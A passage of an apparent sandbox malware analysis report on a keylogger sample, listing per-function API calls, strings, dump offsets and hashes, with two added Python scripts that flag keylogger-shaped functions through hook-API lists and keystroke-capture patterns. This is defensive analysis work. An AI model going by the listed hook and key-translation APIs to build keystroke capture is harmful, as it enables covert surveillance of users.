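The record above is the one an analyst actually wants out of this listing: a routine in the 12330000 dump that timestamps a marker line (GetLocalTime, wsprintfW, the "Offline Keylogger Started" / "Online Keylogger Stopped" strings), closes the log handle and calls UnhookWindowsHookEx, i.e. the teardown of the global keyboard hook the signatures section flags. Finding it by hand in thousands of near-identical records is tedious, so here is an added example (my own code, not Joe Sandbox's) that parses records in this listing's format, pulls out the ones that touch hook APIs or keylogger marker strings, and also shows why the API String ID alone is not a reliable de-duplication key. The SAMPLE text is a trimmed copy of three records from this report (this keylogger routine and the two `_free` routines further down at 00590000); the section and field names are the report's, the parsing logic and the helper names `parse_records`, `keylogger_hits` and `shared_api_string_ids` are mine.

```python
"""Parser and two queries for the per-function records in this listing.

Added example, not Joe Sandbox code. SAMPLE is a trimmed copy of three records
from this report; section and field names are the report's, the parsing logic
and the helper names are my own.
"""
import re
from collections import defaultdict

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Yara matches", "Similarity", "Uniqueness"}

# "<api>.<module>(<args>), ref: <addr>", optionally prefixed by the report's
# "Part of subcall function <addr>:" marker for callees of the listed routine.
API_REF = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
                     r"(?P<name>[\w@]+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

# APIs through which a global keyboard hook is installed, chained and removed.
HOOK_APIS = {"SetWindowsHookExA", "SetWindowsHookExW", "UnhookWindowsHookEx", "CallNextHookEx"}

SAMPLE = """\
APIs
  • Part of subcall function 1233B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
  • Part of subcall function 1233B164: wsprintfW.USER32 ref: 1233B1F3
• CloseHandle.KERNEL32(?), ref: 1233B0B4
• UnhookWindowsHookEx.USER32 ref: 1233B0C7
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 0ca69f09bdd1a2910762349e98f7bf3dc20463767c10de209a55e024eb12998e
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Similarity
• API ID: _free
• String ID: $G
• API String ID: 269201875-4251033865
• Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Similarity
• API ID: _free
• String ID: $G
• API String ID: 269201875-4251033865
• Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
Uniqueness Score: -1.00%
"""


def parse_records(text):
    """Split the listing into records; each one ends at its 'Uniqueness Score' line."""
    records, rec, section = [], {"apis": [], "fields": {}}, None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            rec["fields"]["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(rec)
            rec, section = {"apis": [], "fields": {}}, None
        elif section == "APIs":
            m = API_REF.match(line.lstrip("• "))
            if m:
                rec["apis"].append(m.groupdict())
        elif ":" in line:
            key, value = (s.strip() for s in line.lstrip("• ").split(":", 1))
            rec["fields"][key] = value
            off = re.search(r"Offset: ([0-9A-F]+)", value)  # present on the Source File line
            if off:
                rec["fields"]["Offset"] = off.group(1)
    return records


def keylogger_hits(records):
    """(dump offset, reasons) for records that touch hook APIs or keylogger marker strings."""
    hits = []
    for rec in records:
        reasons = [f"{a['name']} at {a['ref']}" for a in rec["apis"] if a["name"] in HOOK_APIS]
        reasons += [f"{a['args']!r} passed at {a['ref']}" for a in rec["apis"]
                    if a["args"] and "Keylogger" in a["args"]]
        if "Keylogger" in rec["fields"].get("String ID", ""):
            reasons.append(f"String ID {rec['fields']['String ID']!r}")
        if reasons:
            hits.append((rec["fields"].get("Offset"), reasons))
    return hits


def shared_api_string_ids(records):
    """API String IDs carried by more than one distinct routine (different Opcode IDs).

    The first number repeats across records with the same API ID and the second across
    records with the same String ID, so routines with identical imports and string
    collide on it; use Opcode ID or Instruction ID to tell them apart.
    """
    by_id = defaultdict(set)
    for f in (r["fields"] for r in records):
        if "API String ID" in f and "Opcode ID" in f:
            by_id[f["API String ID"]].add(f["Opcode ID"])
    return {k: sorted(v) for k, v in by_id.items() if len(v) > 1}
```

Run `keylogger_hits(parse_records(open("report.txt").read()))` over the full listing (a copy of this page's function records) to get the dump offset and call sites of every routine that installs or removes a hook or references the keylogger marker strings; the `Source File` dump named in the hit is the one to pull for the Yara and config extraction. `shared_api_string_ids` lists the `_free` pair below, which share `269201875-4251033865` yet have different Opcode IDs, so anyone deduplicating records by API String ID would silently merge two different functions.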

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 14642903
  • Part of subcall function 146435D2: RaiseException.KERNEL32(?,?,?,14642925,00000000,00000000,00000000,?,?,?,?,?,14642925,?,146521B8), ref: 14643632
• __CxxThrowException@8.LIBVCRUNTIME ref: 14642920
Strings
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: b44aed1bafc873f8cc5f07ccf3280c10b9ea5bcd0f62386202f38d61d2ef37a4
• Instruction ID: 6d2d7967ebad6924780a51402dee037bb3723edb2de536b80faa876b9278052c
• Opcode Fuzzy Hash: b44aed1bafc873f8cc5f07ccf3280c10b9ea5bcd0f62386202f38d61d2ef37a4
• Instruction Fuzzy Hash: F5F0C838A0020D779F05ABE5EC4499E776C6F206DCB784570FA14A6890EF31F95AC9D4
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: $G
• API String ID: 269201875-4251033865
• Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
• Instruction ID: 65ae12a0bbb77d7111a4b2686b8bd43d871b0f7c6cb24c10c74fdbe4ddc521ba
• Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
• Instruction Fuzzy Hash: 8EE0E53290551203E675623E7E0D75F1E85BBC2772F114237F428963D1DFB449428A9A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: $G
• API String ID: 269201875-4251033865
• Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
• Instruction ID: 9552a1c3b6874f3b35d82d20e642e8e1b80b78437438d76a6889578b38d52f9c
• Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
• Instruction Fuzzy Hash: DBE02B32A0955203E679727D7D097AB0D467BC2331F104237F015963D1DFB48881C999
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: NG$}E
• API String ID: 3519838083-2251168990
• Opcode ID: e7d40fc07d034a65060cda002aaf1e1ab51435aa3cf8f9fa75cdf93eab53bb7f
• Instruction ID: 3844c4a14d6efa5c7fb7a379758fd0200408d731ddbe07096c633af21b92c9e9
• Opcode Fuzzy Hash: e7d40fc07d034a65060cda002aaf1e1ab51435aa3cf8f9fa75cdf93eab53bb7f
• Instruction Fuzzy Hash: FBF09A72E012199ACB14AF9E990ABAEFF78FF84720F10025BE81863281C7740E018AD1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetKeyState.USER32(00000011), ref: 1233B64B
  • Part of subcall function 1233A3E0: GetForegroundWindow.USER32(?,?,123A50F0), ref: 1233A416
  • Part of subcall function 1233A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 1233A422
  • Part of subcall function 1233A3E0: GetKeyboardLayout.USER32(00000000), ref: 1233A429
  • Part of subcall function 1233A3E0: GetKeyState.USER32(00000010), ref: 1233A433
  • Part of subcall function 1233A3E0: GetKeyboardState.USER32(?,?,123A50F0), ref: 1233A43E
  • Part of subcall function 1233A3E0: ToUnicodeEx.USER32(123A5144,0000005B,?,?,00000010,00000000,00000000), ref: 1233A461
  • Part of subcall function 1233A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1233A4C1
  • Part of subcall function 1233A636: SetEvent.KERNEL32(?,?,00000000,1233B20A,00000000), ref: 1233A662
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
• Opcode ID: 48b3f90fb1748fadbea9d1de3d0ce0df700c83369ed6ae93f87a71d4885d3a64
• Instruction ID: 91462aa76307a1ad6391febe6cbe5bc0e2e0f0637add51286ad94d97b4d33bf2
• Opcode Fuzzy Hash: 48b3f90fb1748fadbea9d1de3d0ce0df700c83369ed6ae93f87a71d4885d3a64
• Instruction Fuzzy Hash: 05E09B37B401101788AE323D5D5AAFD3E528742752B42024DE4434B789ED5A5F0683C2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(?,?), ref: 0040958C
  • Part of subcall function 0040A78C: GetModuleFileNameA.KERNEL32(00000000,?,00000050,Semaphore error ,?), ref: 0040A7B5
Strings
• ?, xrefs: 00409573
• Error: system code page access failure; MBCS table not initialized, xrefs: 00409595
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: FileInfoModuleName
• String ID: ?$Error: system code page access failure; MBCS table not initialized
• API String ID: 3255085701-1671459530
• Opcode ID: 01c8b085e7354c6c1099acb78eb840c0f92e9d90cdbeeddb2b530a87d954120d
• Instruction ID: bfbfaf34202878cd0a96e321562c83a51502f64d6fd78a4a08c8a71b0c9657dd
• Opcode Fuzzy Hash: 01c8b085e7354c6c1099acb78eb840c0f92e9d90cdbeeddb2b530a87d954120d
• Instruction Fuzzy Hash: 62E0DF6280A64A2AD70221648C41AA77B5C8F0232AF1402B3E924E61D3E62D8E0083EB
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetKeyState.USER32(00000012), ref: 1233B6A5
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
• Opcode ID: f21b2f929f6c8e2d6f7c1629812bb4db8df759e3c5bc409d7a1e49115376e17f
• Instruction ID: 58f6baf7acb51db94e4274af01a63450c793b807b7f45f7d566a8a1904be2f01
• Opcode Fuzzy Hash: f21b2f929f6c8e2d6f7c1629812bb4db8df759e3c5bc409d7a1e49115376e17f
• Instruction Fuzzy Hash: 40E0CD33A011111BC96E363D4F1D7FC2F168B82292F42020DF4838B69BED568B11D7C2
Uniqueness
Uniqueness Score: -1.00%
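
The two records above (the GetKeyState / GetKeyboardLayout / GetKeyboardState / ToUnicodeEx routine with the [AltL]/[AltR] strings, and the GetKeyState routine with the [CtrlL]/[CtrlR] strings) are the API and string shape of the keystroke-translation code behind the "Installs a global keyboard hook" signature. The following script is an added triage example, not Joe Sandbox code or part of this report: it parses the text form of these per-function records and flags functions whose API set and strings match that shape. The sample records embedded in it are constructed to mirror the report layout, not a verbatim copy, and the thresholds (three key-translation APIs, a SetWindowsHookEx import, or one key-state API next to modifier-key tokens) are this example's own heuristic, not a Joe Sandbox rule.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not Joe Sandbox code).

Parses the text form of the "APIs / Strings / Memory Dump Source / Similarity /
Uniqueness" records and flags functions whose imports and strings look like
keystroke capture. Sample records are constructed to mirror the report layout.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two keylogger-shaped records and one benign CRT record.
SAMPLE = """\
APIs
• GetKeyState.USER32(00000011), ref: 1233B64B
  • Part of subcall function 1233A3E0: GetKeyboardLayout.USER32(00000000), ref: 1233A429
  • Part of subcall function 1233A3E0: GetKeyboardState.USER32(?,?,123A50F0), ref: 1233A43E
  • Part of subcall function 1233A3E0: ToUnicodeEx.USER32(123A5144,0000005B,?,?,00000010,00000000,00000000), ref: 1233A461
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• Opcode ID: 48b3f90fb1748fadbea9d1de3d0ce0df700c83369ed6ae93f87a71d4885d3a64
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetKeyState.USER32(00000012), ref: 1233B6A5
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• Opcode ID: f21b2f929f6c8e2d6f7c1629812bb4db8df759e3c5bc409d7a1e49115376e17f
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(?,?), ref: 0040958C
  • Part of subcall function 0040A78C: GetModuleFileNameA.KERNEL32(00000000,?,00000050,Semaphore error ,?), ref: 0040A7B5
Strings
• Error: system code page access failure; MBCS table not initialized, xrefs: 00409595
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileInfoModuleName
• Opcode ID: 01c8b085e7354c6c1099acb78eb840c0f92e9d90cdbeeddb2b530a87d954120d
Uniqueness
Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
                    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STR_RE = re.compile(r"^•\s*(?P<s>.*?), xrefs: [0-9A-Fa-f]+$")
ID_RE = re.compile(r"^•\s*(?P<k>API ID|String ID|Opcode ID):\s*(?P<v>.*)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
UNIQ_RE = re.compile(r"^Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                  # call-site address
    parent: Optional[str]     # subcall function address when the call is nested


@dataclass
class FunctionRecord:
    offset: str = ""          # base of the memory dump the function was lifted from
    apis: dict = field(default_factory=dict)
    strings: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    uniqueness: Optional[float] = None


def parse_records(text):
    """One FunctionRecord per record; the 'Uniqueness Score' line terminates a record."""
    records, cur, section = [], FunctionRecord(), None
    fields = {"API ID": "api_id", "String ID": "string_id", "Opcode ID": "opcode_id"}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = UNIQ_RE.match(line)
        if m:
            cur.uniqueness = float(m.group(1))
            records.append(cur)
            cur, section = FunctionRecord(), None
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.apis.setdefault(m["api"], ApiCall(m["api"], m["module"], m["ref"], m["parent"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append(m["s"])
        elif section == "Memory Dump Source" and not cur.offset and (m := OFFSET_RE.search(line)):
            cur.offset = m.group(1)
        elif section == "Similarity" and (m := ID_RE.match(line)):
            setattr(cur, fields[m["k"]], m["v"].strip())
    return records


# Heuristic (this example's own, not a Joe Sandbox rule): key-translation APIs and modifier tokens.
KEY_TRANSLATION = {"GetKeyState", "GetAsyncKeyState", "GetKeyboardState",
                   "GetKeyboardLayout", "ToUnicodeEx", "ToUnicode", "ToAscii"}
HOOK_APIS = {"SetWindowsHookExA", "SetWindowsHookExW"}
MODIFIER_RE = re.compile(r"\[(?:Alt|Ctrl|Shift|Win)[LR]?\]")


@dataclass
class Hit:
    offset: str
    opcode_id: str
    matched_apis: list
    modifier_tokens: list


def keylogger_hits(records, min_apis=3):
    """Flag a hook import, >= min_apis key-translation APIs, or a key-state API beside modifier tokens."""
    hits = []
    for r in records:
        matched = sorted(KEY_TRANSLATION & set(r.apis))
        tokens = MODIFIER_RE.findall(r.string_id + "$" + "$".join(r.strings))
        if HOOK_APIS & set(r.apis) or len(matched) >= min_apis or (matched and tokens):
            hits.append(Hit(r.offset, r.opcode_id, matched, tokens))
    return hits


if __name__ == "__main__":
    for h in keylogger_hits(parse_records(SAMPLE)):
        print(f"{h.offset} {h.opcode_id[:12]} apis={h.matched_apis} tokens={h.modifier_tokens}")
```

On the constructed sample the first two records are flagged (the four-API translation routine, and the single GetKeyState routine because of its [CtrlL]/[CtrlR] tokens) while the GetCPInfo CRT routine is not. The Opcode ID is carried through so a hit can be pivoted back to the report, and the dump offset groups hits by the injected region they were lifted from.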

APIs
  • Part of subcall function 005C5552: __onexit.LIBCMT ref: 005C5558
• __Init_thread_footer.LIBCMT ref: 005A1D0B
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: ,kG$0kG
• API String ID: 1881088180-2015055088
• Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
• Instruction ID: fa162afc169b4d982a46583850e549c3b03ac5f59b02308c78e51531900cb38f
• Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
• Instruction Fuzzy Hash: F3E09231104E229EC214A3A8954AF482BD5BB4B320B61412AE005D61C29B167881CA6C
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc8db77216e60d19f390f47f386b6f304388046b032368241243d8297744557c
• Instruction ID: 81a548d4465a01d89e05e935b5bf454d031e67836b0f148a885440edf5cc608a
• Opcode Fuzzy Hash: dc8db77216e60d19f390f47f386b6f304388046b032368241243d8297744557c
• Instruction Fuzzy Hash: 2731BB30B0C202ABD7209A698C90B677B65DB45324F24463BF925E73E1D679FC02C75A
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
                                                                                                                                                                                          • String ID: XXTYPE.CPP$addr${0@${0@
                                                                                                                                                                                          • API String ID: 0-3664494418
                                                                                                                                                                                          • Opcode ID: f30a36144bb8e67d7eba4712a6663792dfa89ab3e2c662a94ad679e1016c065a
                                                                                                                                                                                          • Instruction ID: 0f30cb6d4a7d6e4f212690203bc932f43668cc5df22956ab8a5bf4b8ef741d28
                                                                                                                                                                                          • Opcode Fuzzy Hash: f30a36144bb8e67d7eba4712a6663792dfa89ab3e2c662a94ad679e1016c065a
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF116AB1A40206ABDB00CE95C941B6A77A9EB90314F24843AEE04673C1E779AD109F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"Can't adjust class address (no base class entry found)"$Can't adjust class address (no base class entry found)$XXTYPE.CPP${0@
                                                                                                                                                                                          • API String ID: 0-3684756677
                                                                                                                                                                                          • Opcode ID: f9859a6ca1c982f611af58de7c52229e8db2feff2a37b002e116c0afe2703076
                                                                                                                                                                                          • Instruction ID: 723260384d7068f6cc0ec79a1caf53075dfb55dfbb91f14899e0998c661f9cee
                                                                                                                                                                                          • Opcode Fuzzy Hash: f9859a6ca1c982f611af58de7c52229e8db2feff2a37b002e116c0afe2703076
                                                                                                                                                                                          • Instruction Fuzzy Hash: F80171F160021477DF10DE56CC46BA737689B90754F148833FE04AA2C1F679EA60C6A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ((unsigned __far *)vftAddr)[-1] == 0$IS_CLASS(varType->tpMask)$XX.CPP$XX.CPP
                                                                                                                                                                                          • API String ID: 0-3977902411
                                                                                                                                                                                          • Opcode ID: 61763480cd6257e8be5fbce5af339ccb4a5bfa797259b2e01149b7d09099d994
                                                                                                                                                                                          • Instruction ID: ab0ab24eaa1a4e5197c49b6a77655fdb4534cdab7851837468e2e9b88c36b534
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61763480cd6257e8be5fbce5af339ccb4a5bfa797259b2e01149b7d09099d994
                                                                                                                                                                                          • Instruction Fuzzy Hash: A201D8327443109BEB108E5AC8C9B18FB689B45725F148177E914BF3C9C2796D10C7A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%